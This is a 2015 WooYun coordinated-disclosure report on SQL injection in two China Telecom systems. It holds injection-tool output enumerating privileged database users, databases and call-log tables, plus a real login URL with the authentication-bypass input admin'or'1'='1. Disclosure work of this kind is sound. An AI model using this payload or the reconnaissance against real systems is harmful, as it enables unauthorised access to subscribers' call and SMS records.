当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125724

漏洞标题:运营商安全之中国电信2个系统sa权限sql注射(15裤)

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-07-10 14:16

修复时间:2015-08-28 17:54

公开时间:2015-08-28 17:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

运营商安全之中国电信2个系统sql注射

详细说明:

wooyun-2010-065246


这个洞没有修复,我又发现一个买俩个一起提交了吧!
第一个:

1.png


database management system users privileges:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] adcrbt
[*] Audit
[*] CustomerService
[*] Demo_Login
[*] maxcc
[*] NewApp
[*] PriceReview
[*] sa
[*] Sales
[*] telqq


数据库

[17:29:03] [INFO] retrieved: "ykd
available databases [15]:
[*] ADCRBT
[*] lumigent
[*] LumigentDemoDB
[*] master
[*] model
[*] msdb
[*] nxgjdx
[*] palmoil
[*] ReportServer
[*] ReportServerTempDB
[*] sqlldapinfo
[*] sqlmaildata
[*] telqq
[*] tempdb
[*] ykdbmailpro


current-tables

Database: nxgjdx
[75 tables]
+-----------------------------+
| dbo.Radio_ProgramList |
| dbo.[gjdx _Businesstype] |
| dbo.gjdx_Refer |
| dbo.gjdx_SMS_SENDEND_201406 |
| dbo.gjdx_SMS_SENDEND_201407 |
| dbo.gjdx_SMS_SENDEND_201408 |
| dbo.gjdx_SMS_SENDEND_201409 |
| dbo.gjdx_SMS_SENDEND_201410 |
| dbo.gjdx_SMS_SENDEND_201411 |
| dbo.gjdx_SMS_SENDEND_201412 |
| dbo.gjdx_SMS_SENDEND_201501 |
| dbo.gjdx_SMS_SENDEND_201502 |
| dbo.gjdx_SMS_SENDEND_201503 |
| dbo.gjdx_SMS_SENDEND_201504 |
| dbo.gjdx_SMS_SENDEND_201505 |
| dbo.gjdx_SMS_SENDEND_201506 |
| dbo.gjdx_SMS_SENDEND_201507 |
| dbo.gjdx_SMS_SENDEND_201508 |
| dbo.gjdx_SMS_SENDEND_201509 |
| dbo.gjdx_SMS_SENDEND_201510 |
| dbo.gjdx_SMS_SENDEND_201511 |
| dbo.gjdx_SMS_SENDEND_201512 |
| dbo.gjdx_SMS_SENDEND_today |
| dbo.gjdx_SMS_SENDWAIT |
| dbo.gjdx_SMS_SENDend |
| dbo.gjdx_admin |
| dbo.gjdx_basic |
| dbo.gjdx_blackname |
| dbo.gjdx_call_log |
| dbo.gjdx_call_log_201406 |
| dbo.gjdx_call_log_201407 |
| dbo.gjdx_call_log_201408 |
| dbo.gjdx_call_log_201409 |
| dbo.gjdx_call_log_201410 |
| dbo.gjdx_call_log_201411 |
| dbo.gjdx_call_log_201412 |
| dbo.gjdx_call_log_201501 |
| dbo.gjdx_call_log_201502 |
| dbo.gjdx_call_log_201503 |
| dbo.gjdx_call_log_201504 |
| dbo.gjdx_call_log_201505 |
| dbo.gjdx_call_log_201506 |
| dbo.gjdx_call_log_201507 |
| dbo.gjdx_call_log_201508 |
| dbo.gjdx_call_log_201509 |
| dbo.gjdx_call_log_201510 |
| dbo.gjdx_call_log_201511 |
| dbo.gjdx_call_log_201512 |
| dbo.gjdx_call_log_temp |
| dbo.gjdx_call_log_today |
| dbo.gjdx_config |
| dbo.gjdx_customer |
| dbo.gjdx_customergroup |
| dbo.gjdx_keyword |
| dbo.gjdx_keyword0 |
| dbo.gjdx_mobile_accnbr |
| dbo.gjdx_mobile_prefix |
| dbo.gjdx_qf_record |
| dbo.gjdx_qf_record_bak1 |
| dbo.gjdx_qf_sendnbr |
| dbo.gjdx_sample |
| dbo.gjdx_sample_temp |
| dbo.gjdx_sample_temp_qf |
| dbo.message |
| dbo.nxkj_notice_qf |
| dbo.nxkj_qf |
| dbo.nxkj_qf_agent |
| dbo.nxkj_qf_agent_count |
| dbo.nxkj_sample_qf |
| dbo.r_admin |
| dbo.r_log |
| dbo.shizuishanzhengqi |
| dbo.t_log |
| dbo.tel |
| dbo.test |
+-----------------------------+


4.png


Database: nxgjdx
Table: dbo.gjdx_call_log_201511
[18 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| Atten1 | int |
| Atten2 | int |
| Atten3 | int |
| calleeid | varchar |
| callerid | varchar |
| Calllong | bigint |
| Date1 | datetime |
| Date2 | datetime |
| Del_status | int |
| freechl | int |
| id | bigint |
| inbound | tinyint |
| mobile_prefix | int |
| opertype | int |
| optime | bigint |
| quittime | bigint |
| remark | tinyint |
| trunkid | int |
+---------------+----------+


我就不dump出来了,估计是通话日志吧!
第二个洞:

http://119.60.2.37:2340/login.aspx


账号admin'or'1'='1密码随便

3.png


5.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-14 17:53

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评论